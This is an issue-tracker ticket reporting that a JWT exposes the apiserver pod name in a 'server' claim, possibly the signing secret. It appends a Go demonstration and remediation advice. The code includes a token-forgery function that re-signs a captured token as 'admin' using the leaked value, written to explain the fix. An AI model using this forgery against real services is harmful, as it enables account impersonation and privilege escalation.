- Bug
- Resolution: Fixed
- Critical
- None
- None
- None
- NDS Sprint 37
While testing NDS-1094, I decoded a random JWT secret and noticed a potential glaring security hole:
{
  "exp": 1513015808,
  "id": "lambert8",
  "orig_iat": 1513013179,
  "server": "ndslabs-apiserver-57c4j",
  "user": "lambert8"
}
One of the fields above is "server" and contains the name of the current apiserver pod, but isn't this value also the JWT secret? We should probably replace that with the domain or something innocuous instead...
This ticket is complete when we have removed this field from the JWT.
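Added example (not code from this ticket or from ndslabs-apiserver) showing why the concern matters and what "fixed" has to mean. It assumes a hypothetical HS256 issuer; the ticket does not say which algorithm the apiserver uses, and the functions Sign, Verify, UnverifiedClaims, ForgeWithServerClaim and NewRandomSecret are illustrative, not the project's API. The attacker side needs no secret at all: it base64-decodes the payload, reads the "server" claim, and re-signs a modified payload using that value as the HMAC key. If the issuer really did use the pod name as its secret, the forged token verifies; against an issuer that signs with a random secret and omits the claim, there is nothing to harvest.

```go
package main

import (
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"encoding/base64"
	"encoding/json"
	"errors"
	"fmt"
	"strings"
)

var b64 = base64.RawURLEncoding // JWTs use unpadded base64url (RFC 7515)

func hs256(input string, secret []byte) []byte {
	mac := hmac.New(sha256.New, secret)
	mac.Write([]byte(input))
	return mac.Sum(nil)
}

// Sign produces a compact HS256 token over claims with the given secret.
func Sign(claims map[string]interface{}, secret []byte) (string, error) {
	header, _ := json.Marshal(map[string]string{"alg": "HS256", "typ": "JWT"})
	payload, err := json.Marshal(claims)
	if err != nil {
		return "", err
	}
	input := b64.EncodeToString(header) + "." + b64.EncodeToString(payload)
	return input + "." + b64.EncodeToString(hs256(input, secret)), nil
}

// UnverifiedClaims decodes the payload without checking the signature; this
// is all an attacker needs to read the "server" claim out of a captured token.
func UnverifiedClaims(token string) (map[string]interface{}, error) {
	parts := strings.Split(token, ".")
	if len(parts) != 3 {
		return nil, errors.New("malformed token")
	}
	payload, err := b64.DecodeString(parts[1])
	if err != nil {
		return nil, err
	}
	claims := map[string]interface{}{}
	if err := json.Unmarshal(payload, &claims); err != nil {
		return nil, err
	}
	return claims, nil
}

// Verify checks the signature in constant time before trusting the claims.
func Verify(token string, secret []byte) (map[string]interface{}, error) {
	parts := strings.Split(token, ".")
	if len(parts) != 3 {
		return nil, errors.New("malformed token")
	}
	sig, err := b64.DecodeString(parts[2])
	if err != nil {
		return nil, err
	}
	if !hmac.Equal(sig, hs256(parts[0]+"."+parts[1], secret)) {
		return nil, errors.New("bad signature")
	}
	return UnverifiedClaims(token)
}

// ForgeWithServerClaim is the attacker's move: read "server" from a captured
// token, change the user, and re-sign using that claim as the HMAC key.
func ForgeWithServerClaim(captured, newUser string) (string, error) {
	claims, err := UnverifiedClaims(captured)
	if err != nil {
		return "", err
	}
	server, ok := claims["server"].(string)
	if !ok {
		return "", errors.New("token carries no server claim to exploit")
	}
	claims["user"], claims["id"] = newUser, newUser
	return Sign(claims, []byte(server))
}

// NewRandomSecret is what the issuer should sign with instead: 32 bytes from
// crypto/rand that appear in no token and no pod name.
func NewRandomSecret() []byte {
	secret := make([]byte, 32)
	rand.Read(secret) // crypto/rand only fails if the OS RNG is broken
	return secret
}

func main() {
	pod := "ndslabs-apiserver-57c4j" // pod name quoted in the ticket
	claims := map[string]interface{}{"exp": 1513015808, "id": "lambert8",
		"orig_iat": 1513013179, "server": pod, "user": "lambert8"}
	weak, _ := Sign(claims, []byte(pod)) // hypothetical weak issuer: pod name is the key
	forged, _ := ForgeWithServerClaim(weak, "admin")
	_, err := Verify(forged, []byte(pod))
	fmt.Println("weak issuer accepts forged admin token:", err == nil)
	delete(claims, "server") // hardened issuer: random key, nothing to harvest
	fixed, _ := Sign(claims, NewRandomSecret())
	_, err = ForgeWithServerClaim(fixed, "admin")
	fmt.Println("forgery against hardened issuer:", err)
}
```

Two things follow from this for closing the ticket. Dropping the claim is the right cleanup, but if the secret ever was the pod name, removing the field alone is not a fix: pod names are visible to anyone who can list pods in the namespace, so the signing key must also come from a random source as in NewRandomSecret above. And since the payload is readable without the secret, nothing placed in a claim should be treated as confidential; the domain or a static issuer string, as the ticket suggests, is the right kind of value.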